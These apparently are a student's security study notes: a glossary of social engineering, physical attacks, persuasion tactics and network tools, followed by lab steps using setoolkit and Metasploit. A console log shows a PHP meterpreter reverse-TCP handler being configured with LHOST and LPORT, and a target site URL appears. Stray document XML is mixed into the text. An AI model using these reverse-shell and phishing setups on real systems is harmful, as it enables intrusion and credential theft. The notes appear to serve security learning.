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03.10.2024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Here's an edited version of the list with concise descriptions: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Popular Social Engineering Attacks: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Impersonation: Pretending to be someone else to gain trust or access.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Phishing: Sending fraudulent messages to trick individuals into providing sensitive information.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Whaling/Vishing: Targeting high-profile individuals via email (whaling) or phone calls (vishing).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Smishing: Phishing through SMS messages.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Spim: Spam sent over instant messaging platforms.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Spear Phishing: Personalized phishing attacks aimed at specific individuals or organizations.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Spam: Unsolicited and irrelevant messages, typically sent in bulk.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 Eliciting Information: Subtly extracting sensitive details for future attacks.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9. Prepending: Adding malicious content at the beginning of a message or URL (e.g., fake email addresses).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10. Identity Fraud: Using stolen personal information to impersonate someone.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11. Invoice Scams: Fraudulent invoices sent to trick companies into making payments.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12. Credential Harvesting: Stealing login information through various tactics.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13. Reconnaissance: Gathering information on a target before launching an attack.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14. Influence Campaigns/Hybrid Warfare: Using misinformation and social tactics to sway public opinion.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Physical Attacks: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Shoulder Surfing: Watching someone enter sensitive information.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Dumpster Diving: Searching through trash for useful data.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Tailgating: Following someone into a restricted area without authorization.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Hoaxes: False information spread to cause harm or confusion.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Malicious USB Cable/Flash Drive: Devices loaded with malware to exploit a system when plugged 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Card Cloning: Copying data from a card's magnetic strip.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Skimming: Stealing card details during a legitimate transaction.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Adversarial Artificial Intelligence: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AI to exploit vulnerabilities in systems.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Supply-Chain Attack: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Compromising a third-party provider to infiltrate a target organization.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Reasons for Effectiveness of Social Engineering Attacks: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Authority: Trusting figures of authority.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Intimidation: Using fear to force compliance.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Consensus/Social Proof: Influencing people by showing others’ behavior.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Scarcity: Creating a sense of urgency by implying limited availability.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Urgency: Pushing for immediate action.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Familiarity/Liking: Leveraging personal connections or likability.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Trust: Exploiting established trust.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Spoofing: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Altering source information to mislead recipients.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Nemesis: A tool for creating and analyzing spoofed packets.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Hping2: A packet crafting tool for security testing.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Macchanger: A tool to change MAC addresses for anonymity.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Packet Sniffing Software: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Wireshark: A network protocol analyzer used for monitoring traffic.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Tcpdump: A command-line packet analyzer.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Airodump-ng: A tool for capturing wireless network packets.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su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setoolkit (it will be installed)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ifconfig (diff terminal)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 set 1 -&gt; 2 -&gt; 3 -&gt;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msfconsole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 exploit.multi/handler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 payload php/meterpreter/reverse_tcp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https://iitju.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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msf6 exploit(multi/handler) &gt; use LHOST 192.168.10.196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[-] No results from search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[-] Failed to load module: LHOST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msf6 exploit(multi/handler) &gt; use LHOST 192.168.10.196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[-] No results from search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[-] Failed to load module: LHOST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msf6 exploit(multi/handler) &gt; set LHOST 192.168.10.196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LHOST =&gt; 192.168.10.196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msf6 exploit(multi/handler) &gt; set LHOST 192.168.10.196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LHOST =&gt; 192.168.10.196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msf6 exploit(multi/handler) &gt; set LPORT 444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LPORT =&gt; 444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msf6 exploit(multi/handler) &gt; exploit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[*] Started reverse TCP handler on 192.168.10.196:444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^C[-] Exploit failed [user-interrupt]: Interrupt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[-] exploit: Interrupted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msf6 exploit(multi/handler) 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itju.org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